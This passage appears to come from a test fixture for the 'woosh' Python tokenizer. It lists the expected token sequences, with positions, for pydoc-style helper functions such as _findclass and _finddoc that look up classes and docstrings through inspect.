woosh.Token(woosh.NAME, 'os', 87, 18, 87, 20),
woosh.Token(woosh.OP, '.', 87, 20, 87, 21),
woosh.Token(woosh.NAME, 'path', 87, 21, 87, 25),
woosh.Token(woosh.OP, '.', 87, 25, 87, 26),
woosh.Token(woosh.NAME, 'normcase', 87, 26, 87, 34),
woosh.Token(woosh.OP, '(', 87, 34, 87, 35),
woosh.Token(woosh.NAME, 'dir', 87, 35, 87, 38),
woosh.Token(woosh.OP, ')', 87, 38, 87, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 87, 39, 88, 0),
woosh.Token(woosh.NAME, 'if', 88, 8, 88, 10),
woosh.Token(woosh.NAME, 'normdir', 88, 11, 88, 18),
woosh.Token(woosh.NAME, 'not', 88, 19, 88, 22),
woosh.Token(woosh.NAME, 'in', 88, 23, 88, 25),
woosh.Token(woosh.NAME, 'normdirs', 88, 26, 88, 34),
woosh.Token(woosh.NAME, 'and', 88, 35, 88, 38),
woosh.Token(woosh.NAME, 'os', 88, 39, 88, 41),
woosh.Token(woosh.OP, '.', 88, 41, 88, 42),
woosh.Token(woosh.NAME, 'path', 88, 42, 88, 46),
woosh.Token(woosh.OP, '.', 88, 46, 88, 47),
woosh.Token(woosh.NAME, 'isdir', 88, 47, 88, 52),
woosh.Token(woosh.OP, '(', 88, 52, 88, 53),
woosh.Token(woosh.NAME, 'dir', 88, 53, 88, 56),
woosh.Token(woosh.OP, ')', 88, 56, 88, 57),
woosh.Token(woosh.OP, ':', 88, 57, 88, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 88, 58, 89, 0),
woosh.Token(woosh.INDENT, ' ', 89, 0, 89, 12),
woosh.Token(woosh.NAME, 'dirs', 89, 12, 89, 16),
woosh.Token(woosh.OP, '.', 89, 16, 89, 17),
woosh.Token(woosh.NAME, 'append', 89, 17, 89, 23),
woosh.Token(woosh.OP, '(', 89, 23, 89, 24),
woosh.Token(woosh.NAME, 'dir', 89, 24, 89, 27),
woosh.Token(woosh.OP, ')', 89, 27, 89, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 89, 28, 90, 0),
woosh.Token(woosh.NAME, 'normdirs', 90, 12, 90, 20),
woosh.Token(woosh.OP, '.', 90, 20, 90, 21),
woosh.Token(woosh.NAME, 'append', 90, 21, 90, 27),
woosh.Token(woosh.OP, '(', 90, 27, 90, 28),
woosh.Token(woosh.NAME, 'normdir', 90, 28, 90, 35),
woosh.Token(woosh.OP, ')', 90, 35, 90, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 90, 36, 91, 0),
woosh.Token(woosh.DEDENT, ' ', 91, 0, 91, 4),
woosh.Token(woosh.DEDENT, '', 91, 4, 91, 4),
woosh.Token(woosh.NAME, 'return', 91, 4, 91, 10),
woosh.Token(woosh.NAME, 'dirs', 91, 11, 91, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 91, 15, 92, 0),
woosh.Token(woosh.DEDENT, '', 93, 0, 93, 0),
woosh.Token(woosh.NAME, 'def', 93, 0, 93, 3),
woosh.Token(woosh.NAME, '_findclass', 93, 4, 93, 14),
woosh.Token(woosh.OP, '(', 93, 14, 93, 15),
woosh.Token(woosh.NAME, 'func', 93, 15, 93, 19),
woosh.Token(woosh.OP, ')', 93, 19, 93, 20),
woosh.Token(woosh.OP, ':', 93, 20, 93, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 93, 21, 94, 0),
woosh.Token(woosh.INDENT, ' ', 94, 0, 94, 4),
woosh.Token(woosh.NAME, 'cls', 94, 4, 94, 7),
woosh.Token(woosh.OP, '=', 94, 8, 94, 9),
woosh.Token(woosh.NAME, 'sys', 94, 10, 94, 13),
woosh.Token(woosh.OP, '.', 94, 13, 94, 14),
woosh.Token(woosh.NAME, 'modules', 94, 14, 94, 21),
woosh.Token(woosh.OP, '.', 94, 21, 94, 22),
woosh.Token(woosh.NAME, 'get', 94, 22, 94, 25),
woosh.Token(woosh.OP, '(', 94, 25, 94, 26),
woosh.Token(woosh.NAME, 'func', 94, 26, 94, 30),
woosh.Token(woosh.OP, '.', 94, 30, 94, 31),
woosh.Token(woosh.NAME, '__module__', 94, 31, 94, 41),
woosh.Token(woosh.OP, ')', 94, 41, 94, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 94, 42, 95, 0),
woosh.Token(woosh.NAME, 'if', 95, 4, 95, 6),
woosh.Token(woosh.NAME, 'cls', 95, 7, 95, 10),
woosh.Token(woosh.NAME, 'is', 95, 11, 95, 13),
woosh.Token(woosh.NAME, 'None', 95, 14, 95, 18),
woosh.Token(woosh.OP, ':', 95, 18, 95, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 95, 19, 96, 0),
woosh.Token(woosh.INDENT, ' ', 96, 0, 96, 8),
woosh.Token(woosh.NAME, 'return', 96, 8, 96, 14),
woosh.Token(woosh.NAME, 'None', 96, 15, 96, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 96, 19, 97, 0),
woosh.Token(woosh.DEDENT, ' ', 97, 0, 97, 4),
woosh.Token(woosh.NAME, 'for', 97, 4, 97, 7),
woosh.Token(woosh.NAME, 'name', 97, 8, 97, 12),
woosh.Token(woosh.NAME, 'in', 97, 13, 97, 15),
woosh.Token(woosh.NAME, 'func', 97, 16, 97, 20),
woosh.Token(woosh.OP, '.', 97, 20, 97, 21),
woosh.Token(woosh.NAME, '__qualname__', 97, 21, 97, 33),
woosh.Token(woosh.OP, '.', 97, 33, 97, 34),
woosh.Token(woosh.NAME, 'split', 97, 34, 97, 39),
woosh.Token(woosh.OP, '(', 97, 39, 97, 40),
woosh.Token(woosh.STRING, "'.'", 97, 40, 97, 43),
woosh.Token(woosh.OP, ')', 97, 43, 97, 44),
woosh.Token(woosh.OP, '[', 97, 44, 97, 45),
woosh.Token(woosh.OP, ':', 97, 45, 97, 46),
woosh.Token(woosh.OP, '-', 97, 46, 97, 47),
woosh.Token(woosh.NUMBER, '1', 97, 47, 97, 48),
woosh.Token(woosh.OP, ']', 97, 48, 97, 49),
woosh.Token(woosh.OP, ':', 97, 49, 97, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 97, 50, 98, 0),
woosh.Token(woosh.INDENT, ' ', 98, 0, 98, 8),
woosh.Token(woosh.NAME, 'cls', 98, 8, 98, 11),
woosh.Token(woosh.OP, '=', 98, 12, 98, 13),
woosh.Token(woosh.NAME, 'getattr', 98, 14, 98, 21),
woosh.Token(woosh.OP, '(', 98, 21, 98, 22),
woosh.Token(woosh.NAME, 'cls', 98, 22, 98, 25),
woosh.Token(woosh.OP, ',', 98, 25, 98, 26),
woosh.Token(woosh.NAME, 'name', 98, 27, 98, 31),
woosh.Token(woosh.OP, ')', 98, 31, 98, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 98, 32, 99, 0),
woosh.Token(woosh.DEDENT, ' ', 99, 0, 99, 4),
woosh.Token(woosh.NAME, 'if', 99, 4, 99, 6),
woosh.Token(woosh.NAME, 'not', 99, 7, 99, 10),
woosh.Token(woosh.NAME, 'inspect', 99, 11, 99, 18),
woosh.Token(woosh.OP, '.', 99, 18, 99, 19),
woosh.Token(woosh.NAME, 'isclass', 99, 19, 99, 26),
woosh.Token(woosh.OP, '(', 99, 26, 99, 27),
woosh.Token(woosh.NAME, 'cls', 99, 27, 99, 30),
woosh.Token(woosh.OP, ')', 99, 30, 99, 31),
woosh.Token(woosh.OP, ':', 99, 31, 99, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 99, 32, 100, 0),
woosh.Token(woosh.INDENT, ' ', 100, 0, 100, 8),
woosh.Token(woosh.NAME, 'return', 100, 8, 100, 14),
woosh.Token(woosh.NAME, 'None', 100, 15, 100, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 100, 19, 101, 0),
woosh.Token(woosh.DEDENT, ' ', 101, 0, 101, 4),
woosh.Token(woosh.NAME, 'return', 101, 4, 101, 10),
woosh.Token(woosh.NAME, 'cls', 101, 11, 101, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 101, 14, 102, 0),
woosh.Token(woosh.DEDENT, '', 103, 0, 103, 0),
woosh.Token(woosh.NAME, 'def', 103, 0, 103, 3),
woosh.Token(woosh.NAME, '_finddoc', 103, 4, 103, 12),
woosh.Token(woosh.OP, '(', 103, 12, 103, 13),
woosh.Token(woosh.NAME, 'obj', 103, 13, 103, 16),
woosh.Token(woosh.OP, ')', 103, 16, 103, 17),
woosh.Token(woosh.OP, ':', 103, 17, 103, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 103, 18, 104, 0),
woosh.Token(woosh.INDENT, ' ', 104, 0, 104, 4),
woosh.Token(woosh.NAME, 'if', 104, 4, 104, 6),
woosh.Token(woosh.NAME, 'inspect', 104, 7, 104, 14),
woosh.Token(woosh.OP, '.', 104, 14, 104, 15),
woosh.Token(woosh.NAME, 'ismethod', 104, 15, 104, 23),
woosh.Token(woosh.OP, '(', 104, 23, 104, 24),
woosh.Token(woosh.NAME, 'obj', 104, 24, 104, 27),
woosh.Token(woosh.OP, ')', 104, 27, 104, 28),
woosh.Token(woosh.OP, ':', 104, 28, 104, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 104, 29, 105, 0),
woosh.Token(woosh.INDENT, ' ', 105, 0, 105, 8),
woosh.Token(woosh.NAME, 'name', 105, 8, 105, 12),
woosh.Token(woosh.OP, '=', 105, 13, 105, 14),
woosh.Token(woosh.NAME, 'obj', 105, 15, 105, 18),
woosh.Token(woosh.OP, '.', 105, 18, 105, 19),
woosh.Token(woosh.NAME, '__func__', 105, 19, 105, 27),
woosh.Token(woosh.OP, '.', 105, 27, 105, 28),
woosh.Token(woosh.NAME, '__name__', 105, 28, 105, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 105, 36, 106, 0),
woosh.Token(woosh.NAME, 'self', 106, 8, 106, 12),
woosh.Token(woosh.OP, '=', 106, 13, 106, 14),
woosh.Token(woosh.NAME, 'obj', 106, 15, 106, 18),
woosh.Token(woosh.OP, '.', 106, 18, 106, 19),
woosh.Token(woosh.NAME, '__self__', 106, 19, 106, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 106, 27, 107, 0),
woosh.Token(woosh.NAME, 'if', 107, 8, 107, 10),
woosh.Token(woosh.OP, '(', 107, 11, 107, 12),
woosh.Token(woosh.NAME, 'inspect', 107, 12, 107, 19),
woosh.Token(woosh.OP, '.', 107, 19, 107, 20),
woosh.Token(woosh.NAME, 'isclass', 107, 20, 107, 27),
woosh.Token(woosh.OP, '(', 107, 27, 107, 28),
woosh.Token(woosh.NAME, 'self', 107, 28, 107, 32),
woosh.Token(woosh.OP, ')', 107, 32, 107, 33),
woosh.Token(woosh.NAME, 'and', 107, 34, 107, 37),
woosh.Token(woosh.NAME, 'getattr', 108, 12, 108, 19),
woosh.Token(woosh.OP, '(', 108, 19, 108, 20),
woosh.Token(woosh.NAME, 'getattr', 108, 20, 108, 27),
woosh.Token(woosh.OP, '(', 108, 27, 108, 28),
woosh.Token(woosh.NAME, 'self', 108, 28, 108, 32),
woosh.Token(woosh.OP, ',', 108, 32, 108, 33),
woosh.Token(woosh.NAME, 'name', 108, 34, 108, 38),
woosh.Token(woosh.OP, ',', 108, 38, 108, 39),
woosh.Token(woosh.NAME, 'None', 108, 40, 108, 44),
woosh.Token(woosh.OP, ')', 108, 44, 108, 45),
woosh.Token(woosh.OP, ',', 108, 45, 108, 46),
woosh.Token(woosh.STRING, "'__func__'", 108, 47, 108, 57),
woosh.Token(woosh.OP, ')', 108, 57, 108, 58),
woosh.Token(woosh.NAME, 'is', 108, 59, 108, 61),
woosh.Token(woosh.NAME, 'obj', 108, 62, 108, 65),
woosh.Token(woosh.OP, '.', 108, 65, 108, 66),
woosh.Token(woosh.NAME, '__func__', 108, 66, 108, 74),
woosh.Token(woosh.OP, ')', 108, 74, 108, 75),
woosh.Token(woosh.OP, ':', 108, 75, 108, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 108, 76, 109, 0),
woosh.Token(woosh.COMMENT, '# classmethod', 109, 12, 109, 25),
woosh.Token(woosh.INDENT, ' ', 110, 0, 110, 12),
woosh.Token(woosh.NAME, 'cls', 110, 12, 110, 15),
woosh.Token(woosh.OP, '=', 110, 16, 110, 17),
woosh.Token(woosh.NAME, 'self', 110, 18, 110, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 110, 22, 111, 0),
woosh.Token(woosh.DEDENT, ' ', 111, 0, 111, 8),
woosh.Token(woosh.NAME, 'else', 111, 8, 111, 12),
woosh.Token(woosh.OP, ':', 111, 12, 111, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 111, 13, 112, 0),
woosh.Token(woosh.INDENT, ' ', 112, 0, 112, 12),
woosh.Token(woosh.NAME, 'cls', 112, 12, 112, 15),
woosh.Token(woosh.OP, '=', 112, 16, 112, 17),
woosh.Token(woosh.NAME, 'self', 112, 18, 112, 22),
woosh.Token(woosh.OP, '.', 112, 22, 112, 23),
woosh.Token(woosh.NAME, '__class__', 112, 23, 112, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 112, 32, 113, 0),
woosh.Token(woosh.DEDENT, ' ', 113, 0, 113, 4),
woosh.Token(woosh.DEDENT, '', 113, 4, 113, 4),
woosh.Token(woosh.NAME, 'elif', 113, 4, 113, 8),
woosh.Token(woosh.NAME, 'inspect', 113, 9, 113, 16),
woosh.Token(woosh.OP, '.', 113, 16, 113, 17),
woosh.Token(woosh.NAME, 'isfunction', 113, 17, 113, 27),
woosh.Token(woosh.OP, '(', 113, 27, 113, 28),
woosh.Token(woosh.NAME, 'obj', 113, 28, 113, 31),
woosh.Token(woosh.OP, ')', 113, 31, 113, 32),
woosh.Token(woosh.OP, ':', 113, 32, 113, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 113, 33, 114, 0),
woosh.Token(woosh.INDENT, ' ', 114, 0, 114, 8),
woosh.Token(woosh.NAME, 'name', 114, 8, 114, 12),
woosh.Token(woosh.OP, '=', 114, 13, 114, 14),
woosh.Token(woosh.NAME, 'obj', 114, 15, 114, 18),
woosh.Token(woosh.OP, '.', 114, 18, 114, 19),
woosh.Token(woosh.NAME, '__name__', 114, 19, 114, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 114, 27, 115, 0),
woosh.Token(woosh.NAME, 'cls', 115, 8, 115, 11),
woosh.Token(woosh.OP, '=', 115, 12, 115, 13),
woosh.Token(woosh.NAME, '_findclass', 115, 14, 115, 24),
woosh.Token(woosh.OP, '(', 115, 24, 115, 25),
woosh.Token(woosh.NAME, 'obj', 115, 25, 115, 28),
woosh.Token(woosh.OP, ')', 115, 28, 115, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 115, 29, 116, 0),
woosh.Token(woosh.NAME, 'if', 116, 8, 116, 10),
woosh.Token(woosh.NAME, 'cls', 116, 11, 116, 14),
woosh.Token(woosh.NAME, 'is', 116, 15, 116, 17),
woosh.Token(woosh.NAME, 'None', 116, 18, 116, 22),
woosh.Token(woosh.NAME, 'or', 116, 23, 116, 25),
woosh.Token(woosh.NAME, 'getattr', 116, 26, 116, 33),
woosh.Token(woosh.OP, '(', 116, 33, 116, 34),
woosh.Token(woosh.NAME, 'cls', 116, 34, 116, 37),
woosh.Token(woosh.OP, ',', 116, 37, 116, 38),
woosh.Token(woosh.NAME, 'name', 116, 39, 116, 43),
woosh.Token(woosh.OP, ')', 116, 43, 116, 44),
woosh.Token(woosh.NAME, 'is', 116, 45, 116, 47),
woosh.Token(woosh.NAME, 'not', 116, 48, 116, 51),
woosh.Token(woosh.NAME, 'obj', 116, 52, 116, 55),
woosh.Token(woosh.OP, ':', 116, 55, 116, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 116, 56, 117, 0),
woosh.Token(woosh.INDENT, ' ', 117, 0, 117, 12),
woosh.Token(woosh.NAME, 'return', 117, 12, 117, 18),
woosh.Token(woosh.NAME, 'None', 117, 19, 117, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 117, 23, 118, 0),
woosh.Token(woosh.DEDENT, ' ', 118, 0, 118, 4),
woosh.Token(woosh.DEDENT, '', 118, 4, 118, 4),
woosh.Token(woosh.NAME, 'elif', 118, 4, 118, 8),
woosh.Token(woosh.NAME, 'inspect', 118, 9, 118, 16),
woosh.Token(woosh.OP, '.', 118, 16, 118, 17),
woosh.Token(woosh.NAME, 'isbuiltin', 118, 17, 118, 26),
woosh.Token(woosh.OP, '(', 118, 26, 118, 27),
woosh.Token(woosh.NAME, 'obj', 118, 27, 118, 30),
woosh.Token(woosh.OP, ')', 118, 30, 118, 31),
woosh.Token(woosh.OP, ':', 118, 31, 118, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 118, 32, 119, 0),
woosh.Token(woosh.INDENT, ' ', 119, 0, 119, 8),
woosh.Token(woosh.NAME, 'name', 119, 8, 119, 12),
woosh.Token(woosh.OP, '=', 119, 13, 119, 14),
woosh.Token(woosh.NAME, 'obj', 119, 15, 119, 18),
woosh.Token(woosh.OP, '.', 119, 18, 119, 19),
woosh.Token(woosh.NAME, '__name__', 119, 19, 119, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 119, 27, 120, 0),
woosh.Token(woosh.NAME, 'self', 120, 8, 120, 12),
woosh.Token(woosh.OP, '=', 120, 13, 120, 14),
woosh.Token(woosh.NAME, 'obj', 120, 15, 120, 18),
woosh.Token(woosh.OP, '.', 120, 18, 120, 19),
woosh.Token(woosh.NAME, '__self__', 120, 19, 120, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 120, 27, 121, 0),
woosh.Token(woosh.NAME, 'if', 121, 8, 121, 10),
woosh.Token(woosh.OP, '(', 121, 11, 121, 12),
woosh.Token(woosh.NAME, 'inspect', 121, 12, 121, 19),
woosh.Token(woosh.OP, '.', 121, 19, 121, 20),
woosh.Token(woosh.NAME, 'isclass', 121, 20, 121, 27),
woosh.Token(woosh.OP, '(', 121, 27, 121, 28),
woosh.Token(woosh.NAME, 'self', 121, 28, 121, 32),
woosh.Token(woosh.OP, ')', 121, 32, 121, 33),
woosh.Token(woosh.NAME, 'and', 121, 34, 121, 37),
woosh.Token(woosh.NAME, 'self', 122, 12, 122, 16),
woosh.Token(woosh.OP, '.', 122, 16, 122, 17),
woosh.Token(woosh.NAME, '__qualname__', 122, 17, 122, 29),
woosh.Token(woosh.OP, '+', 122, 30, 122, 31),
woosh.Token(woosh.STRING, "'.'", 122, 32, 122, 35),
woosh.Token(woosh.OP, '+', 122, 36, 122, 37),
woosh.Token(woosh.NAME, 'name', 122, 38, 122, 42),
woosh.Token(woosh.OP, '==', 122, 43, 122, 45),
woosh.Token(woosh.NAME, 'obj', 122, 46, 122, 49),
woosh.Token(woosh.OP, '.', 122, 49, 122, 50),
woosh.Token(woosh.NAME, '__qualname__', 122, 50, 122, 62),
woosh.Token(woosh.OP, ')', 122, 62, 122, 63),
woosh.Token(woosh.OP, ':', 122, 63, 122, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 122, 64, 123, 0),
woosh.Token(woosh.COMMENT, '# classmethod', 123, 12, 123, 25),
woosh.Token(woosh.INDENT, ' ', 124, 0, 124, 12),
woosh.Token(woosh.NAME, 'cls', 124, 12, 124, 15),
woosh.Token(woosh.OP, '=', 124, 16, 124, 17),
woosh.Token(woosh.NAME, 'self', 124, 18, 124, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 124, 22, 125, 0),
woosh.Token(woosh.DEDENT, ' ', 125, 0, 125, 8),
woosh.Token(woosh.NAME, 'else', 125, 8, 125, 12),
woosh.Token(woosh.OP, ':', 125, 12, 125, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 125, 13, 126, 0),
woosh.Token(woosh.INDENT, ' ', 126, 0, 126, 12),
woosh.Token(woosh.NAME, 'cls', 126, 12, 126, 15),
woosh.Token(woosh.OP, '=', 126, 16, 126, 17),
woosh.Token(woosh.NAME, 'self', 126, 18, 126, 22),
woosh.Token(woosh.OP, '.', 126, 22, 126, 23),
woosh.Token(woosh.NAME, '__class__', 126, 23, 126, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 126, 32, 127, 0),
woosh.Token(woosh.COMMENT, '# Should be tested before isdatadescriptor().', 127, 4, 127, 49),
woosh.Token(woosh.DEDENT, ' ', 128, 0, 128, 4),
woosh.Token(woosh.DEDENT, '', 128, 4, 128, 4),
woosh.Token(woosh.NAME, 'elif', 128, 4, 128, 8),
woosh.Token(woosh.NAME, 'isinstance', 128, 9, 128, 19),
woosh.Token(woosh.OP, '(', 128, 19, 128, 20),
woosh.Token(woosh.NAME, 'obj', 128, 20, 128, 23),
woosh.Token(woosh.OP, ',', 128, 23, 128, 24),
woosh.Token(woosh.NAME, 'property', 128, 25, 128, 33),
woosh.Token(woosh.OP, ')', 128, 33, 128, 34),
woosh.Token(woosh.OP, ':', 128, 34, 128, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 128, 35, 129, 0),
woosh.Token(woosh.INDENT, ' ', 129, 0, 129, 8),
woosh.Token(woosh.NAME, 'func', 129, 8, 129, 12),
woosh.Token(woosh.OP, '=', 129, 13, 129, 14),
woosh.Token(woosh.NAME, 'obj', 129, 15, 129, 18),
woosh.Token(woosh.OP, '.', 129, 18, 129, 19),
woosh.Token(woosh.NAME, 'fget', 129, 19, 129, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 129, 23, 130, 0),
woosh.Token(woosh.NAME, 'name', 130, 8, 130, 12),
woosh.Token(woosh.OP, '=', 130, 13, 130, 14),
woosh.Token(woosh.NAME, 'func', 130, 15, 130, 19),
woosh.Token(woosh.OP, '.', 130, 19, 130, 20),
woosh.Token(woosh.NAME, '__name__', 130, 20, 130, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 130, 28, 131, 0),
woosh.Token(woosh.NAME, 'cls', 131, 8, 131, 11),
woosh.Token(woosh.OP, '=', 131, 12, 131, 13),
woosh.Token(woosh.NAME, '_findclass', 131, 14, 131, 24),
woosh.Token(woosh.OP, '(', 131, 24, 131, 25),
woosh.Token(woosh.NAME, 'func', 131, 25, 131, 29),
woosh.Token(woosh.OP, ')', 131, 29, 131, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 131, 30, 132, 0),
woosh.Token(woosh.NAME, 'if', 132, 8, 132, 10),
woosh.Token(woosh.NAME, 'cls', 132, 11, 132, 14),
woosh.Token(woosh.NAME, 'is', 132, 15, 132, 17),
woosh.Token(woosh.NAME, 'None', 132, 18, 132, 22),
woosh.Token(woosh.NAME, 'or', 132, 23, 132, 25),
woosh.Token(woosh.NAME, 'getattr', 132, 26, 132, 33),
woosh.Token(woosh.OP, '(', 132, 33, 132, 34),
woosh.Token(woosh.NAME, 'cls', 132, 34, 132, 37),
woosh.Token(woosh.OP, ',', 132, 37, 132, 38),
woosh.Token(woosh.NAME, 'name', 132, 39, 132, 43),
woosh.Token(woosh.OP, ')', 132, 43, 132, 44),
woosh.Token(woosh.NAME, 'is', 132, 45, 132, 47),
woosh.Token(woosh.NAME, 'not', 132, 48, 132, 51),
woosh.Token(woosh.NAME, 'obj', 132, 52, 132, 55),
woosh.Token(woosh.OP, ':', 132, 55, 132, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 132, 56, 133, 0),
woosh.Token(woosh.INDENT, ' ', 133, 0, 133, 12),
woosh.Token(woosh.NAME, 'return', 133, 12, 133, 18),
woosh.Token(woosh.NAME, 'None', 133, 19, 133, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 133, 23, 134, 0),
woosh.Token(woosh.DEDENT, ' ', 134, 0, 134, 4),
woosh.Token(woosh.DEDENT, '', 134, 4, 134, 4),
woosh.Token(woosh.NAME, 'elif', 134, 4, 134, 8),
woosh.Token(woosh.NAME, 'inspect', 134, 9, 134, 16),
woosh.Token(woosh.OP, '.', 134, 16, 134, 17),
woosh.Token(woosh.NAME, 'ismethoddescriptor', 134, 17, 134, 35),
woosh.Token(woosh.OP, '(', 134, 35, 134, 36),
woosh.Token(woosh.NAME, 'obj', 134, 36, 134, 39),
woosh.Token(woosh.OP, ')', 134, 39, 134, 40),
woosh.Token(woosh.NAME, 'or', 134, 41, 134, 43),
woosh.Token(woosh.NAME, 'inspect', 134, 44, 134, 51),
woosh.Token(woosh.OP, '.', 134, 51, 134, 52),
woosh.Token(woosh.NAME, 'isdatadescriptor', 134, 52, 134, 68),
woosh.Token(woosh.OP, '(', 134, 68, 134, 69),
woosh.Token(woosh.NAME, 'obj', 134, 69, 134, 72),
woosh.Token(woosh.OP, ')', 134, 72, 134, 73),
woosh.Token(woosh.OP, ':', 134, 73, 134, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 134, 74, 135, 0),
woosh.Token(woosh.INDENT, ' ', 135, 0, 135, 8),
woosh.Token(woosh.NAME, 'name', 135, 8, 135, 12),
woosh.Token(woosh.OP, '=', 135, 13, 135, 14),
woosh.Token(woosh.NAME, 'obj', 135, 15, 135, 18),
woosh.Token(woosh.OP, '.', 135, 18, 135, 19),
woosh.Token(woosh.NAME, '__name__', 135, 19, 135, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 135, 27, 136, 0),
woosh.Token(woosh.NAME, 'cls', 136, 8, 136, 11),
woosh.Token(woosh.OP, '=', 136, 12, 136, 13),
woosh.Token(woosh.NAME, 'obj', 136, 14, 136, 17),
woosh.Token(woosh.OP, '.', 136, 17, 136, 18),
woosh.Token(woosh.NAME, '__objclass__', 136, 18, 136, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 136, 30, 137, 0),
woosh.Token(woosh.NAME, 'if', 137, 8, 137, 10),
woosh.Token(woosh.NAME, 'getattr', 137, 11, 137, 18),
woosh.Token(woosh.OP, '(', 137, 18, 137, 19),
woosh.Token(woosh.NAME, 'cls', 137, 19, 137, 22),
woosh.Token(woosh.OP, ',', 137, 22, 137, 23),
woosh.Token(woosh.NAME, 'name', 137, 24, 137, 28),
woosh.Token(woosh.OP, ')', 137, 28, 137, 29),
woosh.Token(woosh.NAME, 'is', 137, 30, 137, 32),
woosh.Token(woosh.NAME, 'not', 137, 33, 137, 36),
woosh.Token(woosh.NAME, 'obj', 137, 37, 137, 40),
woosh.Token(woosh.OP, ':', 137, 40, 137, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 137, 41, 138, 0),
woosh.Token(woosh.INDENT, ' ', 138, 0, 138, 12),
woosh.Token(woosh.NAME, 'return', 138, 12, 138, 18),
woosh.Token(woosh.NAME, 'None', 138, 19, 138, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 138, 23, 139, 0),
woosh.Token(woosh.DEDENT, ' ', 139, 0, 139, 8),
woosh.Token(woosh.NAME, 'if', 139, 8, 139, 10),
woosh.Token(woosh.NAME, 'inspect', 139, 11, 139, 18),
woosh.Token(woosh.OP, '.', 139, 18, 139, 19),
woosh.Token(woosh.NAME, 'ismemberdescriptor', 139, 19, 139, 37),
woosh.Token(woosh.OP, '(', 139, 37, 139, 38),
woosh.Token(woosh.NAME, 'obj', 139, 38, 139, 41),
woosh.Token(woosh.OP, ')', 139, 41, 139, 42),
woosh.Token(woosh.OP, ':', 139, 42, 139, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 139, 43, 140, 0),
woosh.Token(woosh.INDENT, ' ', 140, 0, 140, 12),
woosh.Token(woosh.NAME, 'slots', 140, 12, 140, 17),
woosh.Token(woosh.OP, '=', 140, 18, 140, 19),
woosh.Token(woosh.NAME, 'getattr', 140, 20, 140, 27),
woosh.Token(woosh.OP, '(', 140, 27, 140, 28),
woosh.Token(woosh.NAME, 'cls', 140, 28, 140, 31),
woosh.Token(woosh.OP, ',', 140, 31, 140, 32),
woosh.Token(woosh.STRING, "'__slots__'", 140, 33, 140, 44),
woosh.Token(woosh.OP, ',', 140, 44, 140, 45),
woosh.Token(woosh.NAME, 'None', 140, 46, 140, 50),
woosh.Token(woosh.OP, ')', 140, 50, 140, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 140, 51, 141, 0),
woosh.Token(woosh.NAME, 'if', 141, 12, 141, 14),
woosh.Token(woosh.NAME, 'isinstance', 141, 15, 141, 25),
woosh.Token(woosh.OP, '(', 141, 25, 141, 26),
woosh.Token(woosh.NAME, 'slots', 141, 26, 141, 31),
woosh.Token(woosh.OP, ',', 141, 31, 141, 32),
woosh.Token(woosh.NAME, 'dict', 141, 33, 141, 37),
woosh.Token(woosh.OP, ')', 141, 37, 141, 38),
woosh.Token(woosh.NAME, 'and', 141, 39, 141, 42),
woosh.Token(woosh.NAME, 'name', 141, 43, 141, 47),
woosh.Token(woosh.NAME, 'in', 141, 48, 141, 50),
woosh.Token(woosh.NAME, 'slots', 141, 51, 141, 56),
woosh.Token(woosh.OP, ':', 141, 56, 141, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 141, 57, 142, 0),
woosh.Token(woosh.INDENT, ' ', 142, 0, 142, 16),
woosh.Token(woosh.NAME, 'return', 142, 16, 142, 22),
woosh.Token(woosh.NAME, 'slots', 142, 23, 142, 28),
woosh.Token(woosh.OP, '[', 142, 28, 142, 29),
woosh.Token(woosh.NAME, 'name', 142, 29, 142, 33),
woosh.Token(woosh.OP, ']', 142, 33, 142, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 142, 34, 143, 0),
woosh.Token(woosh.DEDENT, ' ', 143, 0, 143, 4),
woosh.Token(woosh.DEDENT, '', 143, 4, 143, 4),
woosh.Token(woosh.DEDENT, '', 143, 4, 143, 4),
woosh.Token(woosh.NAME, 'else', 143, 4, 143, 8),
woosh.Token(woosh.OP, ':', 143, 8, 143, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 143, 9, 144, 0),
woosh.Token(woosh.INDENT, ' ', 144, 0, 144, 8),
woosh.Token(woosh.NAME, 'return', 144, 8, 144, 14),
